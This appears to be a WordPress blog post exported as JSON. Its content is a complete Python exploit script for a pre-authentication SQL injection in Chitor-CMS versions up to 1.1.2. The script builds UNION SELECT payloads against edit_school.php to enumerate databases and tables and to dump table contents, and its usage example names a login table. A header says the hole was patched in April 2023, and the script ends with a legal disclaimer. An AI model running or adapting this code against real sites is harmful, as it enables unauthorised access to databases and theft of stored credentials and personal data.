#!\/usr\/bin\/python3<\/p>\n
#######################################################
\n# #
\n# Exploit Title: Chitor-CMS v1.1.2 – Pre-Auth SQL Injection #
\n# Date: 2023\/04\/13 #
\n# ExploitAuthor: msd0pe #
\n# Project: https:\/\/github.com\/waqaskanju\/Chitor-CMS #
\n# My Github: https:\/\/github.com\/msd0pe-1 #
\n# Patched the 2023\/04\/16: 69d3442 commit #
\n# #
\n#######################################################<\/p>\n
__description__ = ‘Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.’
\n__author__ = ‘msd0pe’
\n__version__ = ‘1.1’
\n__date__ = ‘2023\/04\/13’<\/p>\n
class bcolors:
\nPURPLE = ‘\\033[95m’
\nBLUE = ‘\\033[94m’
\nGREEN = ‘\\033[92m’
\nOCRA = ‘\\033[93m’
\nRED = ‘\\033[91m’
\nCYAN = ‘\\033[96m’
\nENDC = ‘\\033[0m’
\nBOLD = ‘\\033[1m’
\nUNDERLINE = ‘\\033[4m’<\/p>\n
class infos:
\nINFO = “[” + bcolors.OCRA + bcolors.BOLD + “?” + bcolors.ENDC + bcolors.ENDC + “] ”
\nERROR = “[” + bcolors.RED + bcolors.BOLD + “X” + bcolors.ENDC + bcolors.ENDC + “] ”
\nGOOD = “[” + bcolors.GREEN + bcolors.BOLD + “+” + bcolors.ENDC + bcolors.ENDC + “] ”
\nPROCESS = “[” + bcolors.BLUE + bcolors.BOLD + “*” + bcolors.ENDC + bcolors.ENDC + “] “<\/p>\n
import re
\nimport requests
\nimport optparse
\nfrom prettytable import PrettyTable<\/p>\n
def DumpTable(url, database, table):
\nheader = {“User-Agent”: “5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/108.0.0.0 Safari\/537.36”}
\nx = PrettyTable()
\ncolumns = []\npayload = “\/edit_school.php?id=-2164′ UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\\”” + table + “\\” AND table_schema=\\”” + database + “\\”– -”
\nu = requests.get(url + payload, headers=header)
\ntry:
\nr = re.findall(“qpzkq\\[(.*?)\\]qjkbq”,u.text)
\nr = r[0].replace(‘\\”‘,””).split(‘,’)
\nif r == []:
\npass
\nelse:
\nfor i in r:
\ncolumns.append(i)
\npass
\nexcept:
\npass
\nx.field_names = columns
\npayload = “\/edit_school.php?id=-2164′ UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C ” + str(columns).replace(“[“,””).replace(“]”,””).replace(“\\'”,””).replace(” “,””) + “))%2C0x716a6b6271) FROM ” + database + “.” + table + “– -”
\nu = requests.get(url + payload, headers=header)
\ntry:
\nr = re.findall(“qpzkq\\[(.*?)\\]qjkbq”,u.text)
\nr = r[0].replace(‘\\”‘,””).split(‘,’)
\nif r == []:
\npass
\nelse:
\nfor i in r:
\ni = i.split(“xzmdpl”)
\nx.add_rows([i])
\nexcept ValueError:
\nr = re.findall(“qpzkq\\[(.*?)\\]qjkbq”,u.text)
\nr = r[0].replace(‘\\”‘,””).split(‘,’)
\nif r == []:
\npass
\nelse:
\nfor i in r:
\ni = i.split(“xzmdpl”)
\ni.append(“”)
\nx.add_rows([i])
\nprint(x)<\/p>\n
def ListTables(url, database):
\nheader = {“User-Agent”: “5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/108.0.0.0 Safari\/537.36”}
\nx = PrettyTable()
\nx.field_names = [“TABLES”]\npayload = “\/edit_school.php?id=-2164′ UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x” + str(database).encode(‘utf-8’).hex() + “)– -”
\nu = requests.get(url + payload, headers=header)
\ntry:
\nr = re.findall(“qpzkq\\[(.*?)\\]qjkbq”,u.text)
\nr = r[0].replace(‘\\”‘,””).split(‘,’)
\nif r == []:
\npass
\nelse:
\nfor i in r:
\nx.add_row([i])
\nexcept:
\npass
\nprint(x)<\/p>\n
def ListDatabases(url):
\nheader = {“User-Agent”: “5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/108.0.0.0 Safari\/537.36”}
\nx = PrettyTable()
\nx.field_names = [“DATABASES”]\npayload = “\/edit_school.php?id=-2164′ UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA– -”
\nu = requests.get(url + payload, headers=header)
\ntry:
\nr = re.findall(“qpzkq\\[(.*?)\\]qjkbq”,u.text)
\nr = r[0].replace(‘\\”‘,””).split(‘,’)
\nif r == []:
\npass
\nelse:
\nfor i in r:
\nx.add_row([i])
\nexcept:
\npass
\nprint(x)<\/p>\n
def Main():
\nMenu = optparse.OptionParser(usage=’python %prog [options]’, version=’%prog ‘ + __version__)
\nMenu.add_option(‘-u’, ‘–url’, type=”str”, dest=”url”, help=’target url’)
\nMenu.add_option(‘–dbs’, action=”store_true”, dest=”l_databases”, help=’list databases’)
\nMenu.add_option(‘-D’, ‘–db’, type=”str”, dest=”database”, help=’select a database’)
\nMenu.add_option(‘–tables’, action=”store_true”, dest=”l_tables”, help=’list tables’)
\nMenu.add_option(‘-T’, ‘–table’, type=”str”, dest=”table”, help=’select a table’)
\nMenu.add_option(‘–dump’, action=”store_true”, dest=”dump”, help=’dump the content’)
\n(options, args) = Menu.parse_args()<\/p>\n
Examples = optparse.OptionGroup(Menu, “Examples”, “””python3 chitor1.1.py -u http:\/\/127.0.0.1 –dbs
\npython3 chitor1.1.py -u http:\/\/127.0.0.1 -D chitor_db –tables
\npython3 chitor1.1.py -u http:\/\/127.0.0.1 -D chitor_db -T login –dump
\n“””)
\nMenu.add_option_group(Examples)<\/p>\n
if len(args) != 0 or options == {‘url’: None, ‘l_databases’: None, ‘database’: None, ‘l_tables’: None, ‘table’: None, ‘dump’: None}:
\nMenu.print_help()
\nprint(”)
\nprint(‘ %s’ % __description__)
\nprint(‘ Source code put in public domain by ‘ + bcolors.PURPLE + bcolors.BOLD + ‘msd0pe’ + bcolors.ENDC + bcolors.ENDC + ‘,’ + bcolors.RED + bcolors.BOLD + ‘no Copyright’ + bcolors.ENDC + bcolors.ENDC)
\nprint(‘ Any malicious or illegal activity may be punishable by law’)
\nprint(‘ Use at your own risk’)<\/p>\n
elif len(args) == 0:
\ntry:
\nif options.url != None:
\nif options.l_databases != None:
\nListDatabases(options.url)
\nif options.database != None:
\nif options.l_tables != None:
\nListTables(options.url, options.database)
\nif options.table != None:
\nif options.dump != None:
\nDumpTable(options.url, options.database, options.table)
\nexcept:
\nprint(“Unexpected error”)<\/p>\n
if __name__ == ‘__main__’:
\ntry:
\nMain()<\/p>\n
except KeyboardInterrupt:
\nprint()
\nprint(infos.PROCESS + “Exiting…”)
\nprint()
\nexit(1)<\/p>\n","protected":false},"excerpt":{"rendered":"
#!\/usr\/bin\/python3 ####################################################### # # # Exploit Title: Chitor-CMS v1.1.2 – Pre-Auth SQL Injection # # Date: 2023\/04\/13 # # ExploitAuthor: msd0pe # # Project: https:\/\/github.com\/waqaskanju\/Chitor-CMS # # My Github: https:\/\/github.com\/msd0pe-1 # # Patched the 2023\/04\/16: 69d3442 commit # # # ####################################################### __description__ = ‘Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.’ __author__ = ‘msd0pe’ __version__ = ‘1.1’ …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-40573","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40573","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=40573"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40573\/revisions"}],"predecessor-version":[{"id":40602,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40573\/revisions\/40602"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=40573"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=40573"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=40573"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}